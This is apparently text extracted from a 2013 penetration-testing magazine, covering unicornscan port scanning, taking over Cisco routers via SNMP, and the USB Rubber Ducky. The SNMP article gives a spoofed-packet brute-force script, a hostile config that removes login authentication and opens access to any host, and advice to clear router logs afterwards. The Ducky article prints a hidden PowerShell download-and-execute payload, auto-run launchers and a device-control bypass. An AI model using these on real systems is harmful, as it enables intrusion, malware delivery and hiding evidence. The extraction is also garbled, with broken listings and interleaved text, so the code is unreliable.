on your malware specimen. This report makes reviewing the behavioral analysis quick and easy.


As any security practitioner will tell you dealing

with malicious software is sometimes an endless
fight. Its a time consuming process to gather all
the information necessary to understand how the
software was delivered, how it was installed, what
additional programs were installed, and if any sensitive information was retrieved from your network.
It takes dedication and perseverance to manually
answer all these questions.
Utilizing an automated framework as discussed
in this article, allows organizations of any size to
quickly and accurately, analyze potentially malicious software with the intent of proactively protecting your environment. This open source solution has the flexibility allowing any organization to
customize a solution to fit their needs.

Christopher Ashby

Christopher Ashby, Principle IT Security Analyst at GLOBALFOUNDRIES, has more than 15 years of proven experience participating in a broad range of corporate initiatives including architecting, engineering, and operating
information-security solutions in direct support of business objectives. In his most current role he serves alongside a team of engineers responsible for the security of
a large global organization. For specific information on
the author or to contact him please visit his LinkedIn
profile (
05/2013 (24) August


Unicorn Magic Help in

In process of pentesting, many of us, including myself, like to use
always the same tools. However, in one moment, I figured out that
diversity of tools in use during testing gives better result; in other
words, if time allows me to do it, I like to verify results which I get
in process.

irst and critical phase of testing is reconnaissance where we usually relay on nmap
which is the most famous and the best tool
(or one of the best ones). Recently, I have started to use unicorn to complete my reconnaissance
phase and I have finded several very useful options of this tool, and these options will be explained in this article.



Scanning whole C class network with repeating

(-R) packets is useful if new host appear on network. In the code presented in Listing 3 the following commands are used for:

It is a scan technique used to localize, without

complete TCP handshake, where the information
about open ports is gathered. It is also called half
open scan, TCP handshake is reset before competition. In the code presented in Listing 1 the following commands are used for:
-mT activating SYN scan;
-Iv printing result immediately;
-r 1000 setting packet number

this case 1000).

per second (in

Scanning UDP Ports

In the scan presented in Listing 2, we can see:

meaning that we will do dns resolv before
and after scan but not during the scan;
-mU scanning open UDP ports;

05/2013 (24) August

repeating packets what is a very useful option to get more reliable results and in situations where you test unreliable networks; meaning that scan port 53 syntax could be,22,53, what
means that ports 21,22,53 will be scanned; scanning all ports 1-65535.

Scanning C Class Network

-P port 80 activating
-w writing responses

pcap filters;
in .pcap format file; very
useful for writing reports.

Syn scan with spoofing address s option

and tcpdump

In the code presented in Listing 4 the -z option is

used for sniffing alike.
As you can see unicorn can easily became one
of you favorite reconnaissance tools. The options
shown in this article can be useful in pentesting
process, especially for gathering evidence and
material for writing reports.

Page 50

Listing 1. TCP SYN Scan code

root@bt:~ # unicornscan -mT -Iv -r 1000 | tee syn_scan.txt
adding mode `TCPscan ports `7,9,11,13,18,19,21-23,25,37,39,42,49,50,53,65,67-70,
63809,64429,65000,65506,65530-65535 pps 1000
using interface(s) vmnet0
scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 7 Seconds
TCP open ttl 64
TCP open ttl 64
TCP open ttl 64
TCP open ttl 64
sender statistics 997.0 pps with 338 packets sent total
listener statistics 338 packets recieved 0 packets droped and 0 interface drops
TCP open
21] from ttl 64
TCP open
22] from ttl 64
TCP open
80] from ttl 64
TCP open
ipp[ 631] from ttl 64

Listing 2. Scanning UDP ports

root@bt:~ # unicornscan -H -mU -Iv R 3
adding mode `UDPscan ports `53 pps 300
using interface(s) eth0
scaning 1.00e+00 total hosts with 1.00e+00 total packets, should take a little longer than 7 Seconds
UDP open ttl 126
sender statistics 298.9 pps with 3 packets sent total
listener statistics 3 packets recieved 0 packets droped and 0 interface drops
UDP open
53] from ttl 126

Listing 3. Scanning C Class Network

root@bt:~ #
root@bt:~ # unicornscan -Iv R 3
using interface(s) vmnet0
scaning 2.56e+02 total hosts with 8.65e+04 total packets, should take a little longer than 4 Minutes, 55 Seconds
TCP open ttl 64
TCP open ttl 64

05/2013 (24) August

Page 51

TCP open ttl 64
TCP open ttl 64
TCP open ttl 64
TCP open ttl 64
TCP open ttl 64
TCP open ttl 64
sender statistics 127.4 pps with 86528 packets sent total
listener statistics 671 packets recieved 0 packets droped and 0 interface drops
TCP open
from ttl 64
TCP open
from ttl 64
TCP open
ipp[ 631]
from ttl 64
TCP open
from ttl 64
TCP open
from ttl 64
TCP open
from ttl 64
TCP open
https[ 443]
from ttl 64
TCP open
mysql[ 3306]
from ttl 64

root@bt:~ #
unicornscan -H -msf -Iv -P port 80 -w http.pcap
using interface(s) vmnet0
scaning 1.00e+00 total hosts with 3.38e+02 total packets, should take a little longer than 8 Seconds
opening `http.pcap for pcap log
connected ->
TCP open ttl 64
sender statistics 272.2 pps with 338 packets sent total
listener statistics 5 packets recieved 0 packets droped and 0 interface drops
TCP open
from ttl 64

Listing 4. Syn scan with spoofing address s option and tcpdump

root@bt:~ #

unicornscan -mT -Iv


3 0.000363 TCP

6945 > ds-srv [SYN] Seq=778425887 Win=16384
Len=0 MSS=1436 SACK_PERM=1 WS=0 TSV=2013279436 TSER=0
4 0.003238 TCP
57247 > 5138 [SYN] Seq=726078113 Win=16384
Len=0 MSS=1436 SACK_PERM=1 WS=0 TSV=2013279436 TSER=0
5 0.006568 TCP
18579 > hybrid [SYN] Seq=986023341
Win=16384 Len=0 MSS=1436 SACK_PERM=1 WS=0 TSV=2013279436 TSER=0
6 0.009933 TCP
28980 > afs3-fileserver [SYN] Seq=604879882
Win=16384 Len=0 MSS=1436 SACK_PERM=1 WS=0 TSV=2013279436 TSER=0
7 0.013275 TCP
54231 > lds-distrib [SYN] Seq=651828969
Win=16384 Len=0 MSS=1436 SACK_PERM=1 WS=0 TSV=2013279436 TSER=0
root@bt:~ #
unicornscan -mT -z
got packet with length 54 (cap 54) with header length at 14
IP : ihl 5 (opt len 0) size 40 version 4 tos 0x00 tot_len 40 ipid 0 frag_off 0000 DF
IP : ttl 64 protocol `IP->TCP chksum 0xb710 [cksum ok] IP SRC IP DST
TCP : size 20 sport 200 dport 8913 seq 0x00000000 ack_seq 0x867e0302 window 0
TCP : doff 5 res1 0 flags `--R-A--- chksum 0x7ef7 [cksum ok] urgptr 0x0000

05/2013 (24) August

Page 52

TCP : options length 0 data length 0

got packet with length 54 (cap 54) with header length at 14
IP : ihl 5 (opt len 0) size 40 version 4 tos 0x00 tot_len 40 ipid 0 frag_off
IP : ttl 64 protocol `IP->TCP chksum 0xb710 [cksum ok] IP SRC
TCP : size 20 sport 1433 dport 21017 seq 0x00000000 ack_seq 0x832f73ca window
TCP : doff 5 res1 0 flags `--R-A--- chksum 0xdd64 [cksum ok] urgptr 0x0000
TCP : options length 0 data length 0
got packet with length 54 (cap 54) with header length at 14
IP : ihl 5 (opt len 0) size 40 version 4 tos 0x00 tot_len 40 ipid 0 frag_off

0000 DF

0000 DF

Aleksandar Bratic

Aleksandar Bratic (CISSP), works as CISO at financial institution in Serbia, has interests in penetration testing, methodologies, techniques, risk mitigations methods and countermeasures.


Hacking Cisco Routers

with SNMP
Cisco routers have a number of remote access and management
services available. One of the most used and least insecure
is SNMP. Here I will show some of the common techniques
and demonstrates a new tool for taking over routers that are
vulnerable. Virtually all networking devices support SNMP, and
most network monitoring and management software uses it. Cisco
routers have an old but less well known feature that allows a single
packet to trigger a configuration upload from an arbitrary server.
This is going to be the basis of all the attacks discussed here.

NMP v1 in Cisco routers can make use of an

ACL to limit who has visibility to the SNMP
facility. However since SNMP v1 uses UDP
packets, they can be spoofed with an address that
is allowed by the ACL. Spoofing packets is sometimes possible, but requires attention to the networking setup of the attackers host and gateways.
SNMP uses a community string as a weak password for access to the device. There are many tools
that already allow attackers to brute force community strings with massive password lists. However,
there was really never a good way to combine both
brute forcing and udp spoofing into a well working
and easy attack.


To be able to compromise a router with SNMP you

need to find and use the Read/Write SNMP community. With this community name you can pull
and push a router config. While pulling a config
is very useful, you really want to push a config.
To push a config you will need a public facing tftp
server running. The examples here are going to
use the latest version of BackTrack which should
give you all the tools you will need. First thing is to
modify tftpdhpa to allow for creation of files. Usually this is not recommended, but we need it to be
05/2013 (24) August

able to create files on the fly as configs are collected. Edit /etc/default/tftpd-hpa and make the
TFTP_OPTIONS have the -c.
TFTP_OPTIONS=-c secure

Restart the tftp service and lets do some scanning.

Scanning with onesixtyone

Lets start with some good SNMP brute forcing.

Here we use onesixtyone and a dictionary to start
an attack on the BackTrack workstation (Listing 1).
I used the local dict.txt dictionary, but using a
larger dictionary will hopefully yield more results.
The target is This scan is going
to test for a read only community string. A read only string is still a very good thing to have and will allow you to pull the configuration from the router. A
copy of the routers configuration will enable you to
attempt to crack the type 5 and type 7 passwords.
A copy of the configuration will also show all ACLs
and any other management plane restrictions.
A read only community string and a read/write
(RW) community string both allow you to read the
configuration. If you have a community string that
you found from scanning, you need to try a few
snmpset commands to see if you have the RW

Page 54

string. Not all values in the MIB tree are writeable.

Furthermore, not all MIBs are available depending
on the device and features enable. Here we will try
an OID that we know will be available and that is
writeable: system.sysLocation.0.
On the BackTrack workstation, try to see if the
community string is writeable (Listing 2).
First we did a snmpget on the sysLocation, which
reported it as NewYork. Then we used a snmpset
command with the string of San Francisco. After
checking the result, we see that it has in fact been
changed. A RW community string is very powerful
and allows you to modify configurations, change
passwords, reboot the device, and pretty much
have total control of the device.

The router will use its routing table to make the tftp
request and that outgoing interface can be different than what you have targeted.
The OID we want is
tpserver_ip and you will need to set a variable to
be the filename of the config. With the write variable in hand, we can use snmpset and hopefully
upload the new.cfg file easily.
root@bt:/# snmpset -v 1 -c abc123 s new.cfg
-c abc123 is the write community. is the tftp server


sets the variable to a string new.cfg

the uploaded config.
s new.cfg

Putting a Config

Pulling down a configuration is good, but pushing

up a new configuration is the most useful to us.
There are a few caveats with this method that you
should be aware of. First is that the configuration
snippet that is in the file you are uploading, is going
to be merged into the running configuration. This
makes for interesting results if you do not think
through which commands you are executing. Generally speaking, adding more configuration is safer than removing and redoing sections. Secondly,
this new merged configuration exists in the running
config, not the startup config. For any changes to
survive a reboot, a save of the config is necessary.
Third, the IP address you use for the tftp callback
needs to be available from wherever this particular
router is calling from, and that may be from a different IP address than the one that you are targeting.

hosting the

If all is well you should see a config being uploaded. The Cisco ios commands contained in the file
new.cfg will have been uploaded and merged right
into the running config. The ios commands could
have been any valid ios command available, from
reseting the enable password to modifying an ACL.

Spoofing Network Traffic

First a quick refresh on how spoofing traffic works.

We are forging the source address of a UDP packet. The source address needs to be something that
can hopefully pass an ACL on a firewall or a host restriction. Using this technique is almost exclusively
used with UDP traffic. With TCP traffic, a syn/ack
response is needed before any meaning packet
communication can take place. This makes spoof-

Listing 1. Using onesixtyone and a disctionary to perform an attack

Cd /pentest/enumeration/snmp/onesixtyone
./onesixtyone -c dict.txt
Scanning 1 hosts, 50 communities
Cant open hosts file, scanning single host: [private] Cisco IOS Software, 7200 Software (C7200-ADVENTERPRISEK9-M), Version

Listing 2. Snmpget on sysLocation

root@bt:/# snmpget -v1 -c
root@bt:/# snmpset -v1 -c
root@bt:/# snmpget -v1 -c

05/2013 (24) August

abc123 system.sysLocation.0

= STRING: NewYork
abc123 system.sysLocation.0 s San Francisco
= STRING: San Francisco
abc123 system.sysLocation.0
= STRING: San Francisco

Page 55

ing the source address nearly impossible given we
cannot control the routing back to the spoofed address. In spoofing traffic, everything must be contained in one single packet. Of the UDP protocols,
SNMP has the most possibility. It has command
and control uses. In v1, it uses unencrypted passwords and it is still widely deployed.
From the diagram of the packet and the hosts
(Figure 1), you can see that a forged SNMP packet is sent to the victim router, who will respond to
the forged packet by sending a response to the
spoofed host. Here the spoofed host is quite surprised to get a response to a packet that it never sent. This unexpected response is sometimes
logged, but other times may get discarded depending on the setup.
Can I spoof traffic from my Internet connection?
The answer is maybe. About 30% of Internet
connections have ISPs that do not properly filter
source addresses. There are a number of tools
and tricks to check if you can spoof an address.
However, before you try to experiment, you almost
certainly need to directly connect to the Internet
without a firewall/NAT router. Any kind of natting
will rewrite your source addresses by definition
and any modern firewall will check the reverse
path and will drop your packets. If your ISP correctly filters spoofed addresses, you are out of luck
and will need to try another connection.

Spoofing SNMP Packets

So the snmpset/snmpget command didnt work?

This is hardly surprising, most admins will set an
ACL on the router to only allow access to that service from a known host or network. The setting
looks like this:
snmp-server community ChangeMe RW 10

where 10 is an ACL that only allows authorized

servers. Usually this is a network monitoring server or trusted hosts that need this kind of access.
Guessing the netblock or host is a little bit of a
game. We can make some educated guesses
here; it is probably from a netblock that is owned
by the corporation. You can use a whois command to locate netblocks that are owned by the
same corporation. You can also query the global
BGP table to locate netblocks that are advertised
by that ASN. And finally you use RFC 1918 address space to round out the list of guessed netblocks. I would put the RFC 1918 addresses near
the top as that is going to be your better bet. Most
network monitoring servers are going to be internal servers that lack public IP addresses. Lastly, I would query DNS for the domain and look
for possible monitoring servers. Try hostnames
like mon, zenoss, snmp, cacti, solarwinds,
nagios hpov, and opennms.

Figure 1. Sending SNMP packet to the victim IP

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Page 56

Listing 3. Modifying packets in the script

# copyright jason nehrboss [email protected]
if [ $# -ne $EXPECTED_ARGS ]
echo Usage: `basename $0` [target ip address]
[tftp host ip address] [filename
of tftp file] [password file]
[spoof netblocks]
OBI_OID=30 LL3 30 LL2 06 LL2b 2b 06 01 04 01 09
02 01 35 IPADD
REQ_ERR=02 01 00 02 01 00
REQ_ID=02 04 74 4d e9 6a
SNP_MES_O=30 LL6 02 01 00
#grab ip tuples
for i in {1..4}; do TFTPIP[$i]=`echo $2| awk -v
n=$i -F. {print $n }`;
#process ip tuples into oid DER encoding
for i in {1..4}; do
if (( ${TFTPIP[$i]} > 127 )); then
DER=`printf 81 %.2x $(( ${TFTPIP[$i]} % 128
DER=`printf %.2x ${TFTPIP[$i]}`
VL1=`printf %.2x ${#FILENAME}`
TF=`echo -n $FILENAME | od -A n -t x1`
OIDIP_L=`echo -n $OIDIP | sed s/ //g | wc -c`
OIDIP_L2=$(($OIDIP_L/2 + 9))
OBI_OID=${OBI_OID//LL2b/`printf %.2x $OIDIP_
LL2=$(($OIDIP_L2 + ${#FILENAME} + 4))
OBI_OID=${OBI_OID//LL2/`printf %.2x $LL2`}
LL3=$(($LL2 + 2))

05/2013 (24) August

OBI_OID=${OBI_OID//LL3/`printf %.2x $LL3`}

LL4=$(($LL3 + 14))
SET_REQ=${SET_REQ//LL4/`printf %.2x $LL4`}
BASEPACKET_L=`echo -n $BASEPACKET | sed s/ //g
| wc -c`
echo building prehash
mkdir PRE
for i in `cat $4`; do
COMMUN=${COMMUN//PRIVATE/`echo -n ${UP}| od -A n
-t x1`}
COMMUN=${COMMUN//LL5/`printf %.2x $PWLEN`}
COMMUN_L=`echo -n $COMMUN | sed s/ //g | wc
3 ))
echo $OUTPUT | xxd -r -p - PRE/$i.${UDP_L}.out
echo done building prehash, sending packets
for k in PRE/*.out ; do
SIZE=`echo $k | awk -F. {print $2} `
for j in `cat $5`; do
nohup hping2 $1 -c 1 -d $SIZE -p 161 --udp
--file $k --spoof $j 2>&- &
if (( throttle == 0 )); then
sleep 0.5
echo done sending packets
sleep 5
rm -rf ./PRE

Page 57

You need to construct a file that contains a list of
hosts to spoof. When spoofing large netblocks, use
host IP addresses at the beginning and end of the
netblocks. Also try and randomize some of the addresses, you never know we all get lucky sometimes when guessing. You will also need a large
dictionary to test against. Be aware here that your
search space will be (number of hosts * dictionary)
so 100 hosts with a dictionary of a 100 words becomes a search space of 10,000 combinations.
The current tool can brute force 280 packets a second, so plan ahead before you attempt to extremely
large dictionaries and enumerated netblocks. Next,
you need to make sure hping2 is installed on your
machine. This is the tool we are going to use to stuff
raw spoofed packets onto the network. You will also
need od, sed, xxd, bash these are almost always
installed somewhere on any modern Unix system.

How the Tool Works

To replay and rewrite a packet, you first need one.

I used Wireshark to capture a packet that was very
close to what I wanted as a packet. Then I exported the packet into a space delimited hex format.
Since you are going to replay the packet you cant
have any of the ip/udp header, you want just the
payload. In Wireshark you can look at the protocol
decode of the packet, just select the payload and
export the selected bytes only.
While a captured payload is useful and can immediately be used with hping2, we need to modify the password variable. This is not as easy as
it seems, finding the password in hex and replacing it with a new password is easy. Other parts of
the payload need to be fixed up to account for any
Listing 4. Sending packets
root@bt:~/snmp# ./ example.cfg
password.list spoof.list
building prehash
done building prehash, sending packets
done sending packets
root@bt:~/snmp# grep example.cfg syslog
Apr 30 23:27:00 bt in.tftpd[19923]: RRQ from filename example.cfg
Lsiting 5. Clearing the log

05/2013 (24) August

differences in password length. Since an attacker needs to modify the tftp server IP address, this
needs to change as well. All the variables in the
packet are wrapped by header and length values.
This means to construct a SNMP set packet I had
to write and recalculate all parts of the packet in the
script. Listing 3 shows the script written in bash.

Building up precomputed payloads

The first part of the script is more of a performance

hack than anything. Each different password in the
password list makes a single unique payload. Hping2
when sending spoofed packets would use the same
payload, so we only need to compute the payload
once per password. Precomputed packets are
stored in their own directory called PRE. The first part
of the script sets up some templates for parts of the
packet that do not change. Some variables like REQ_
ID should change if you want to adhere to the RFC
spec, but we do not as it is just overhead. The next
part of the script does some DER encoding of the
the tftp IP address and formatting of the tftp filename.
After that, a long series of calculations and substitutions are performed that builds up the packet from
the inner most field and calculates header lengths as
it goes along. That process ends with a base packet
that is only missing a password in it. The next loop
then will loop over the list of passwords and complete
each base packet with a new password. The format
for the final packet is in binary, so a conversion from
hex to a binary output format in a file is needed.

Sending a Spoofed SNMP Packet en Masse

In the script, we are at the main loop of the program. From here the operations are trivial. We first
router# copy startup running
router#clear log

Lsiting 5. Clearing the log

router# copy startup running
router#clear log

Page 58

grab the first payload, extract the size, and setup

a loop for all of the spoof targets we would like to
try. Then a hping2 command with the packet and a
spoofed IP address are nohuped. There are some
performance issues with flooding the network like
this. Because of the performance issues, there is
a throttle built into the loop. Every 1000 packets
the script will sleep for 0.5 seconds. There are OS
limits on the host you are running this from, and
there are queuing limits on the receiving router. In
timing on modern hardware the 0.5 second sleep
was negligible on the overall timing of the brute
force run. Here, I am able to brute force 280 packets a second, which fits within the receiving routers SNMP message queue. Listing 4 shows an
example of execution. The script is run with the required arguments, and after it runs, the syslogs are
checked for a tftp upload of the example.cfg file.

The Config to Upload

I used this example.cfg config file to upload to the

victim router. The biggest problem facing you uploading a config blindly is that we are really not
sure what state the config is in. While we can do
a config pull first, study the config and then upload a crafted version, a more direct and generic
attack might be a little more efficient. The direct attack has downsides, it is noisy and obvious, so the
idea here is that as soon as the config is uploaded, you have to login and fix up the running configs. There are a couple goals with this config that
we are trying to accomplish. First, we need to redo
any authentication schemes to be something that
is known for us. We dont know what is there, so
we must make sure to create our own. We should
also set a new enable password.
aaa new-model
aaa authentication login test none
enable secret 0 trustme

that you will need to connect to those specific vtys

to get the unpassworded connection. Your best bet
is to get an established connection that is waiting for
a username or a password, and then with that connection still waiting, establish another to get a different vty. Depending on which vtys that are currently being used and the protocols configured, you may
have to establish a few dummy connections.
If the configuration got uploaded and you get a connection refused, you will need to modify it to line vty
0 1. Be warned that as soon as you do this, you will
need to login and fix things up as the next person
to login will not be prompted for a password. This is
something most sysadmins will notice and fix fast.
Line vty 3 4
login authentication test
access-group test
transport in all

Now we can try and login and fix up a little bit of

the mess (see Listing 5).
The first thing to take care of is to overwrite your
injected config with the original config. We dont
want the injected config to end up in nvram, and if
we dont accidentally write the config, the real admin may, so we run copy startup running. Most
admins would notice that the router they always
logging into one day does not ask for credentials,
and we changed the enable password. So we need
to copy the original startup config to running. We
clear the onboard logs (this is always a good idea).
And we still have an enable prompt! Enjoy.


We also need to account for any ACL restrictions

on the vtys. We dont know what ACLs are there
to begin with (we are flying blind here), so we will
create our own.
ip access-list standard test
permit any

Now, we are going to bring it all together and redo

the vtys so that we can login from anywhere and not
be bugged with those pesky passwords. I have only modified the 34 vty. What this means for you is
05/2013 (24) August

Download links

This isnt a perfect story though, syslog/tacacs/rancid are all going to leave traces here of what you
did. The router when it receives a snmpset config
upload, it sends a message to syslog about the config uploading. This is really a bad thing to see in your
syslogs, you should expect most admins to take action upon seeing an upload from a foreign address.

Jason Nehrboss

Page 59


The USB Rubber Ducky

The Pentesters USB
The USB Rubber Ducky or Ducky, for short, is a programmable
Human Interface Device (HID), that, when inserted into an
Operating System (OS) will interact or assume the identity of a
certain device: keyboard, mass storage or a given combination,
allowing the injection of keystrokes or applications into the OSs
memory. The key focus on the Ducky is that it can be programmed
in a simple high-level language that any user of any technical skill
level can quickly and easily learn to program.

he project was to process the popular Teensy HID Attacks. But there were two small
problems with regards to the Teensy: programming and size. Some knowledge of C/C++
was needed to effectively program the device, and
with the addition of the micro sdcard reader the resultant hardware was rather bulky and ugly.
The solution was to create a custom/bespoke
board that used a similar chipset that had the micro sdcard reader built-in. The aim was to fit everything into a standard USB case, making the
Ducky a sleak little ninja. Thus, the Ducky became
a smaller, lighter, and yet more powerful adversary.
Initially, the Ducky was limited to supporting only
the Microsoft Windows OS and the US language/
keyboard mapping. Suspicions were that this was a
firmware related problem. But thanks to the developments of one community member, midnitesnake,
the community has seen an influx of different language support (US, GB, FR, DE, NW, SW, RU, ES,
PT, BR, BE) and a number of device firmware; Keyboard, Mass Storage, and Composite Device (Keyboard & Mass Storage). The rise of the Ducky has
seen the return of Auto-Run style attacks, as the injected keyboard payload can execute a file on the
mass storage partition or even on another device.
No longer limited to the Microsoft Windows platform, midnitesnake has hacked the firmware so
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that it can function on other OSs. The full list includes now:

Mac OSX;
Other Unix based OSs;

In this article we will look at the application of the

Ducky and its different features.

The Ducky Breakdown

The Ducky relies on three essential components:

The Hardware;
The Firmware;
The Encoder.


Jason Applebaum is the man behind the initial

hardware and first firmware (that still comes as the
stock firmware, when you purchase the device).
Jason produced a state-machine that would quickly and effectively take raw two-byte codes, and turn

Page 60

them into HID control characters. The state machine manages the state of the keys (button down/
button up) so the user does not have to worry
about the complexity of the HID protocol, and the
fact that every emulated keypress has to be dealt
with twice key down and key up. The Duckys
board may vary in color (depending on production
runs), but essentially all current Duckies are Revision 2 (R2). An updated Revision 3 that should
contain yet another more powerful chip, with more
memory, possibly opening other attack possibilities, is currently in the concept phase.


One key factor was to make a high-level scripting language that would be easy for the public to
learn, in order to quickly develop interesting and
effective payloads. The Hak5 Team constructed
the first Ducky-Code or rather Ducky Script. This
took plain simply English commands and keyboard
identifiers and translating them into a series of twobyte codes. One-byte for modifiers, such as shift,
caps_lock, and others, and one-byte for the actual
key press a, b, c The Team wanted to create an
opensource sub-program the Encoder that would
address the need of converting the high level commands into these two-byte codes. The program
had to function on any OS and for this reason Java
was used to compile a program that would translate English instructions to the raw binary code
(inject.bin) that the Ducky needed. The Encoder that comes delivered with the Ducky is Jason
Applebaums original version, which unfortunately
works only on US languages. But read on
When midnitesnake built the community firmware he decided to keep the current Encoder and
the state machine (covered below), so that all code
was backward compatible. He discovered that the
initial language problems were in-fact located in
the Encoder.jar and not in the firmware. Using a
USB sniffer, midnitesnake was able to determine
the HID codes for additional keys, and secret behind multiple key presses (representing three keystrokes within two bytes) and the fact that HID
codes would represent different characters on the
keyboard depending on the selected language of
the OS, effectively opening up the power of the
Ducky to the whole world!
This second version of the encoder was published as open-source on a googlecode website
only supporting US and GB keyboard mappings.
Midnitesnake turned to the community to help fill-in
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the blanks for other countries. First came French,

then Deutsch, and after a few months more, communities were combining their efforts to help aid
in adding support for their countries/languages.
To this day, the community is still growing; if your
language/keyboard is not supported, jump on the
Hak5 forums for support (

Community Firmware

As the world was initially left with a firmware

that would only work in Microsoft Windows, midnitesnake took on the challenge of building the first
cross-OS firmware. Back in December 2011 the
Hak5 source code had not yet been released, so
the firmware had to be designed and written from
scratch! By analyzing the Ducky under a magnifying glass the chipset could easily be read Atmel
AT32UC3B1256. Visiting the Atmel website (http:// midnitesnake discovered that the
USB HID documentation and Atmel compiler (Atmel Studio) were all freely available for developers
and hobbyists. Following Atmels examples, midnitesnake started to code his own firmware. Unfortunately, the firmware never worked it was not
until February 2012, when Hak5 finally released
their code, that the mistake was spotted the clock
speeds of the micro-controller were all wrong! After
correcting the code, midnitesnake found that the
new firmware sprang into life, and was additionally
10x faster and, surprisingly, worked across several OSs (Windows, Ubuntu and OSX). But at this
point, it was just a C-language Proof-of-Concept
(PoC), with no state-machine or Ducky Script this
PoC was difficult for users to program. So for backwards compatibility and ease of use, midnitesnake
ported Jason Applebaums state machine to the
new Ducky community firmware, giving the community an effectively new penetration testing toy.
He continued to develop addition firmware, all with
different features: specific triggers, mass storage,
and device composition. To this day midnitesnake
is still working as the sole firmware developer trying to create new features, and make the Ducky
easier to use.

HID Injection Attacks

The stock firmware is a basic keyboard HID injection attack. This essentially means that the Ducky
is behaving as an automatic keyboard typing
much faster than any human. The Duckys speed
is limited to the USB bus and the clock speed of
the micro-controller. Still it can type in seconds
what would take the average human minutes.

Page 61

The Ducky can quickly type on a machine that
has briefly been left unlocked, or it can be used
in brute-force attacks to compromise a login form
or authorization request. In-fact the Ducky can be
used in any situation where a keyboard is normally
used, even to aid in repetitive tasks. We will now
look at a simple Ducky payload to demonstrate the
simple nature of Ducky Script and how simple the
Ducky is to program.
Creating an inject.bin
Copy the Sample Payload from Listing 1 and insert the text into any text editor (Notepad, Nano,
Vi) and save to a file called sample.txt.
To run the encoder, you need to check if Java is
installed on your machine. Open a command-line
terminal with cmd.exe, and type java version, if
you receive command not found it is possible that
Java is not installed on your system. Visit http:// to download Java
for your system.
Now to convert the sample.txt into an inject.bin,
copy the command from Listing 2.
Alternatively, if you are not using an American
configuration / language, you can switch languages be using the l flag (see Listing 3).
Then simply copy the inject.bin over to the sdcard (using a suitable adapter).
Remove the sdcard, and insert into the Duckys
sdcard reader. Plug the Ducky into a Windows
Computer. And watch the payload open notepad
and write your test message.
If you want some ideas on creating some Ducky
Script payloads, the community is maintaining a
small list on the Hak5 github repository https://
Payloads. Also if you are more interested in attack
vector payloads visit
simple-ducky-payload-generator/ for a collection of
remote shells and social engineering type payloads.

communal-area/smokers-area, hoping someone

notices a drive, picks it up and inserts it into their
machine back at their desk. The USB starts a reverse-shell to a server Bob controls, Bob can then
start hacking ACME-Financial from the inside-out.
Bob made a reverse-shell payload (see Listing 4),
and inserted the Ducky into its case. The Ducky
now resembles a plain USB drive; which upon insertion would rapidly start typing at the keyboard
and effectively create a reverse-shell to Bobs
server on the Internet. Bob stuck a sticker on the
USB labeled 2012 Top Account Info hoping someone would spot it, pick it up, and try to read the
USB drive in their machine.
Bob waits patiently in his car, using his cellular
modem to access the Internet. Bob sits quietly, intensely staring at his screen, waiting for the ping of
a reverse-shell connecting. Then boom, Bob has

Case Study Social Engineering

DELAY 3000
STRING This is a Test. My First Ducky Payload!

Listing 2. Converting Simple Payload into inject.bin

using Encoder v2.6
java jar duckencoder.jar i sample.txt o

Listing 3. Converting Simple Payload into inject.bin

using Encoder v2.6 and GB Keyboard Mapping
java jar duckencoder.jar l resources\ i sample.txt o inject.bin

Listing 4. Powershell Download and Execute Payload

We will now look at a case study where the Ducky

was used during a penetration test:
Bob is a Professional Penetration Tester for company X. Bobs specialty is Social Engineering engagements. Company ACME-Financial, has hired
company X (Bobs employer) to perform some annual penetration testing to ensure that all their customers financial information is safe and cannot be
hacked into by a 3rd party (industrial espionage).
Bob, being an experienced Social Engineer decides
to drop several USB drives (Duckies) in the car-park/
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Listing 1. Simple Payload

Page 62

DELAY 3000
STRING powershell -windowstyle hidden
(new-object System.Net.WebClient).
txt,%TEMP%\exploit.exe); Start-Process

access to the local network! Someone has inserted one of Bobs Duckies into their computer.

DLP Attacks

Shortly after discovering the answer to building different key-mappings without the need to alter the
firmware, midnitesnake released a firmware that
allowed the Ducky to function as a normal USB
Mass Storage device. This was functional but
slow; as the Ducky is Open-Source the Manufacturer (Hak5) nor midnitesnake (community leader)
could use the proprietary SDIO code that allows
fast file transfers. Hence, the Ducky is limited to the
maximum speed of the MMC data transfer rate of
approximately 150KB/s. This firmware release was
the initial stepping stone, for the progression of the
Composite Duck, nick-named The Twin Duck.
However, there is an important part the Ducky can
play. The firmware has been given the functionality
to mimic a specific USB VID and PID from within
a file stored on the micro-sdcard called vidpid.bin.
This file is read by the microcontroller as power is
initially supplied to the device, and the values contained within this file are used to manipulate the data on the Duckys USB stack. When the OS starts
to interrogate the device for the VID, PID, and class
identifiers, this information is then supplied to the
OS so the appropriate driver can be loaded. Any
device control software (DLP solutions), which operates on white/black-lists, can therefore be easily
bypassed as the Ducky can pretend to be an authorised device. For example, if an organisation only allowed encrypted Kingston Data Traveller USB
Drives, the Ducky would pretend to by a Kingston
Data Traveller. The OS would correctly mount the
drive; and the user is free to copy data to/from the
device. This has been successfully demonstrated
within the industry with organistions restricting the
use of USB Disk Drives to a particular vendor that
supplies encrypted drives. The Ducky is able to pretend to be an encrypted drive and can successfully
be mounted. The file vidpid.bin can be easily be altered by any hex editor software (Windows: HXD, Linux: xxd, hexedit).
The VID and PID are read as Hexadecimal values
and not ASCII. For example to mimic the USB VID
PID of a Kingston Data Traveller set the first four
bytes of the vidpid.bin file to:
09 51 16 00

Then, you need to save the file, unplug, and reinsert the Ducky. You should then find that the
05/2013 (24) August

OS will now identify the Ducky as a Kingston Data Traveler Drive. Since this development, Anti-Virus (AV) companies and other DLP vendors
have jumped onto the Ducky project in order to
research viable counter-measures. Currently, the
vendors have come up with the following solutions to stop Ducky DLP attacks:
Additionally using the USB serial number to
verify the device. Current Ducky firmware deListing 5. Windows Example Auto-run Attack Code in
Ducky Script
DELAY 3000
STRING for /f %d in (wmic volume get driveletter^, label ^| findstr DUCKY) do set
STRING %myd%\payload.exe

Listing 6. OSX Example Auto-Run Attack Code in Ducky

DELAY 3000
STRING /Volumes/DUCKY/payload.bin

Listing 7. Ubuntu Example Auto-Run Attack Code in Ducky

DELAY 3000
STRING Terminal
STRING /media/DUCKY/payload.bin

05/2013 (24) August

velopments have not established an easy way

of manipulating serial numbers. Currently the
user would need to recompile the firmware in
order to change the USB serial number.
Additionally using the USB Vendor labels;
again, this has to be manually changed inside
the firmware source code and re-compiled.
Fully disabling USB Mass Storage Support for
Users that are not authorised to use mass storage devices.

Auto-Run Type Attacks

The Ducky has numerous alternative firmware created by midnitesnake; the composite device (or
